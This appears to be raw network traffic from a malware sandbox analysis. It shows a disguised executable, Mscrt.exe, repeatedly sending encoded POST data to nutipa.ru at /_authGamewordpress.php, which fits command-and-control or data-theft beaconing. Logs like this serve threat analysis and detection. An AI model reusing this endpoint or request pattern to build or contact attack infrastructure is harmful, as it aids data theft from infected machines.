Dec 15, 2024 04:17:56.091056108 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YiBEKTcv8OUM500NT7VzDHpjQxPZy4CrIxgEtBqJjF%2F3R7H1rZZ%2Fc1GETuVKVQ2C2dwjst9518eC06OlgUQKRH1ECp9M4yWNW6DYdYxgUjet%2BntkfxK2TpihMoU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23488f2a3e4369-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3365&min_rtt=1592&rtt_var=4143&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=92528&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49773	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:56.335892916 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:56.685735941 CET	2536	OUT	Data Raw: 50 51 43 5f 5f 5b 58 56 5d 5a 56 51 50 5e 57 51 55 57 5e 48 5a 5f 5b 5e 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQC__[XV]ZVQP^WQUW^HZ_[^YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$<.9>)'\5?"E?7[4<<Z1.^1&)'3>5<=-+.F'#P ?
Dec 15, 2024 04:17:57.420438051 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:57.666733980 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohF%2FYNZxiD%2FWi8raNEJ41NbrQDeEUOJ4GlpNy9ObScJvM5BFtpgchMv6%2Fy5V4WDhE3CjiXUiaMoqf7L6kJE4eFIK9d2l7XUIF440kVdYpOrx14y1t8jIONjOUsw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234898eb70421d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7257&min_rtt=1580&rtt_var=11947&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=31065&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a Data Ascii: 44W@T
Dec 15, 2024 04:17:57.858416080 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49775	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:58.003993988 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:58.357353926 CET	1424	OUT	Data Raw: 55 57 46 5d 5a 58 58 51 5d 5a 56 51 50 51 57 51 55 57 5e 40 5a 54 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UWF]ZXXQ]ZVQPQWQUW^@ZT[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(.2[?)7"?>)>+#?1!2==)3,$."X+)S,.F'#P
Dec 15, 2024 04:17:59.078721046 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:59.340574026 CET	947	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48gbxTdUyZtg%2Bhiy%2BYQPteR3a5NpFe9nC4yDCuhiauz1LE5fZfDHA3olDGmzOYIasK%2Bq%2F1KdKa8gVmpFtHz1oyJBai33q2K%2FSkUssycIoB9kuWZXdeCMJFmCliE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348a34c7042ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3473&min_rtt=1732&rtt_var=4132&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=93213&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 3a 03 21 04 2d 0c 34 00 2b 08 2d 3f 36 0b 2b 56 3c 09 33 32 3a 00 27 3b 38 07 3e 13 28 0e 24 39 3d 5a 23 1c 03 1c 3f 0e 21 5b 25 0c 21 51 03 11 21 03 31 3d 30 5b 29 3a 2f 07 32 32 2b 5a 24 3d 02 14 28 28 2d 08 26 3b 34 0a 22 2d 38 19 3a 3a 20 5a 28 39 2f 5c 2e 2d 2d 0c 37 36 2e 53 0c 17 25 5b 2b 29 0c 58 20 1c 1c 0c 27 2c 11 56 23 2a 3a 10 3e 55 2f 08 33 33 38 0b 27 07 27 0a 21 33 36 09 31 03 2d 01 23 0b 36 1c 29 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:!-4+-?6+V<32:';8>($9=Z#?![%!Q!1=0[):/22+Z$=((-&;4"-8:: Z(9/\.--76.S%[+)X ',V#*:>U/338''!361-#6)%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49776	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:58.303647995 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:17:58.654325962 CET	2536	OUT	Data Raw: 50 56 43 5d 5f 59 5d 51 5d 5a 56 51 50 59 57 50 55 5c 5e 48 5a 56 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PVC]_Y]Q]ZVQPYWPU\^HZV[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'<.Y>#"<!(.0 '%=22-.*3$%-&^<>,;.F'#P #
Dec 15, 2024 04:17:59.389596939 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:17:59.629169941 CET	800	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:17:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiP1NXg3fCg%2B%2Fcod2Y6lQ2srH%2BojDSfDfPF9c%2BSKP1fVQxQ0MWngMT8LsoTh0ASGcooBz0zTQE20aq%2FIirs70P23ZYx5lUTZgKi2R%2FzJ14P09tsYdY6pIUHfQks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348a53d2fc342-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3580&min_rtt=1674&rtt_var=4441&sent=5&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=86252&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49783	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:17:59.864044905 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:00.216905117 CET	2536	OUT	Data Raw: 50 50 46 5c 5f 5d 5d 51 5d 5a 56 51 50 5c 57 54 55 53 5e 40 5a 53 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PPF\_]]Q]ZVQP\WTUS^@ZS[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(&?:#/>B?>+X #%X&Y%X%>+X'-=+3V8;.F'#P 7
Dec 15, 2024 04:18:00.948698044 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:01.199095011 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGgCmVzoC6D1cwymY0tX5hrQwOiJiG%2BNhvAqFKm7L3Dz8knhflzBpMsG%2FHRN6Cj7dhmkTAHy1l4NGW%2BOKMhJtDMX50aXszUAajmZBX9RtDkimmhOR7KUbA31IbA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348aefb4c78e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4104&min_rtt=1783&rtt_var=5311&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=71726&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49784	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:01.443942070 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:01.797174931 CET	2536	OUT	Data Raw: 50 57 46 5d 5f 57 58 50 5d 5a 56 51 50 5e 57 51 55 53 5e 43 5a 51 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PWF]_WXP]ZVQP^WQUS^CZQ[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+-.)46&D<( /4'-1&>)T*3,$>5<U&;;.F'#P ?
Dec 15, 2024 04:18:02.060420036 CET	1236	OUT	Data Raw: 0b 0b 1c 1a 3e 5e 02 26 02 2c 06 20 31 28 2a 21 0c 3e 00 14 24 09 22 2b 3d 09 32 13 04 2f 1f 0b 3d 10 05 27 3d 07 2f 3d 09 23 2c 26 3d 07 19 36 28 5c 13 13 30 5c 06 34 0e 2d 24 1a 2d 29 05 38 07 3b 0a 5a 34 3d 13 0a 0a 55 0b 2c 33 5c 08 27 30 28 Data Ascii: >^&, 1(!>$"+=2/='=/=#,&=6(\0\4-$-)8;Z4=U,3\'0(-^:>'$-#;57&! U=?H6839&7)/^8(9'>8-%,78[<?R2<?%)6)>06<%#-5>=#6 #Z=#04;,#->=40<5 450'Y',!&5(8Z0_6?$#\.>*>\
Dec 15, 2024 04:18:02.530371904 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:02.829961061 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4M5pBqZWSmTTd4arYqC3x5bidi6V6r9S9Bl3SIkXMFvPDXXW0YmrR94Oln4kGzzAjCZxcJ0jaH0JUyJUsABtU%2FbyDzDGadxBdx3VK43BdCNV92BHXNeM5jMs2Ls%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348b8db518cb1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3762&min_rtt=1798&rtt_var=4603&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=83361&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49790	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:03.074174881 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:03.420119047 CET	2536	OUT	Data Raw: 50 55 46 5f 5f 5c 5d 56 5d 5a 56 51 50 51 57 53 55 52 5e 46 5a 5f 5b 5b 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PUF__\]V]ZVQPQWSUR^FZ_[[YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^')-:[>45<-<!/4&>*]%>'==0&8.F'#P
Dec 15, 2024 04:18:04.226675987 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49793	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:04.481334925 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:04.826153994 CET	1424	OUT	Data Raw: 50 51 43 5b 5f 5d 58 50 5d 5a 56 51 50 51 57 53 55 54 5e 49 5a 50 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQC[_]XP]ZVQPQWSUT^IZP[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$Z)>&[=)#X5)(X!?4[%-.&*,$>9?0"/.F'#P
Dec 15, 2024 04:18:05.565924883 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:05.818264961 CET	944	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDdBRovlnaFGq6WLEpL9ulIAY2a6OWac%2FZaXQWNL0AQrRis7uEzjLHk%2FgjIF1cqi3P6PE3pyFfBMf7AY8La8c7EjC2J0SqDzopddVjlZeFbaVDn4x4PuW3%2BOgUA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348cbddb65e68-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3062&min_rtt=1582&rtt_var=3554&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=108728&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 3a 01 35 04 32 1d 34 2e 24 1b 2d 2f 29 50 3f 30 20 40 27 32 39 13 33 3b 2b 58 28 2e 38 0c 31 29 03 58 20 22 03 1d 3e 37 3d 59 26 1c 21 51 03 11 22 5a 24 3d 24 12 3e 29 23 02 24 31 02 06 32 03 2b 00 3c 3b 2e 1d 33 06 3c 0c 34 07 28 51 3a 04 28 5a 3c 04 2b 5f 2e 07 32 1e 23 0c 2e 53 0c 17 25 5c 28 39 32 59 34 32 13 55 24 12 1a 0c 23 07 3d 0e 3f 33 01 09 27 30 27 1e 33 00 3c 14 21 1e 35 19 25 2a 32 5a 34 0b 35 0c 3e 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:524.$-/)P?0 @'293;+X(.81)X ">7=Y&!Q"Z$=$>)#$12+<;.3<4(Q:(Z<+_.2#.S%\(92Y42U$#=?3'0'3<!5%*2Z45>"%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49797	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:04.606820107 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:04.951395988 CET	2536	OUT	Data Raw: 50 52 43 5c 5f 5f 58 5e 5d 5a 56 51 50 5d 57 5b 55 5c 5e 47 5a 53 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PRC\__X^]ZVQP]W[U\^GZS[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$(^=;#/><- 7&]1X-U3_'.%?;.F'#P 3
Dec 15, 2024 04:18:05.692956924 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:05.954385996 CET	792	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfSRxF17keefruvHD1CdU2ljqXnm1jwlCgQtpGdc5AZzxF8iaKsbcFs%2F5WMuRGWIPwRg1epPPv81W8pNTfJqRGX%2F7gNeLiIsO11DJKgHCv52gF76x1U2igcBmHU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348cc99ec42a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2849&min_rtt=1591&rtt_var=3113&sent=5&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=125246&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49798	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:06.199029922 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:06.545017004 CET	2536	OUT	Data Raw: 55 55 46 5d 5a 5a 5d 52 5d 5a 56 51 50 50 57 54 55 50 5e 45 5a 51 5b 58 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UUF]ZZ]R]ZVQPPWTUP^EZQ[XYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'<>%?);5%<.4!?X2-1X2)300=>X=0%S;.F'#P
Dec 15, 2024 04:18:07.285881996 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:07.542258978 CET	801	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weI8Qv%2B4oaWartOfEVvhcJgj%2BEKObNOccUzCEDISJMezaI%2BLEDThfDj1lsEOGdj%2FHTlbl23w60OECCw%2FcwmU526TWtCqbjUit2%2BXu93Xen6XjBG9JlnAtUuD7VY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348d69b220ca8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6966&min_rtt=1717&rtt_var=11142&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=33400&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49804	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:07.789426088 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:08.138839960 CET	2536	OUT	Data Raw: 50 5f 43 5e 5f 57 58 52 5d 5a 56 51 50 5f 57 50 55 50 5e 46 5a 51 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P_C^_WXR]ZVQP_WPUP^FZQ[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(=Y?:4"<<-#\ <$1&\'.)U#3Z3>_+3%8.F'#P
Dec 15, 2024 04:18:08.874358892 CET	25	IN	HTTP/1.1 100 Continue
